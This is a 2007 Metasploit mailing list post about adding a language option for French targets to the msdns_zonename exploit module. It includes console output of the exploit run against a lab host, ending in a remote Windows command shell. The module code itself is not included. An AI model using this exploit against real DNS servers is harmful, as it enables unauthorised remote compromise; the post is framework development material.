Metasploit mailing list archives
msdns_zonename (rev 4711)
From: fab at revhosts.net (Fabrice MOURRON)
Date: Fri, 20 Apr 2007 00:46:14 +0200
With the last release of this module, I had some pain to found an easiest way to implement the french targets with the automatic mode. So, I add a new OptString to select the country language and I add some conditions. It's not very sexy, but it's an easiest way to implement the next targets for others languages ;-) msf exploit(msdns_zonename) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Language English no Language for automatic target: English, French RHOST 192.168.0.200 yes The target address RPORT 0 yes The target port Payload options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2) msf exploit(msdns_zonename) > set Language French Language => French msf exploit(msdns_zonename) > rexploit [*] Started bind handler [*] Connecting to the endpoint mapper service... [*] Discovered Microsoft DNS Server RPC service on port 2189 [*] Connecting to the endpoint mapper service... [*] Detected a Windows 2003 SP1-SP2 target... [*] Trying target Windows 2003 Server SP1-SP2 French... [*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ... [*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ... [*] Sending exploit... [*] Sending stage (474 bytes) [*] Error: no response from dcerpc service [*] Command shell session 4 opened (192.168.0.2:50275 -> 192.168.0.200:4444) Microsoft Windows [version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32> -------------- next part -------------- A non-text attachment was scrubbed... Name: msdns_zonename.rb Type: text/x-ruby-script Size: 7813 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070420/9387ee29/attachment.bin> -------------- next part -------------- @+ Fab
Current thread:
- msdns_zonename (rev 4711) Fabrice MOURRON (Apr 19)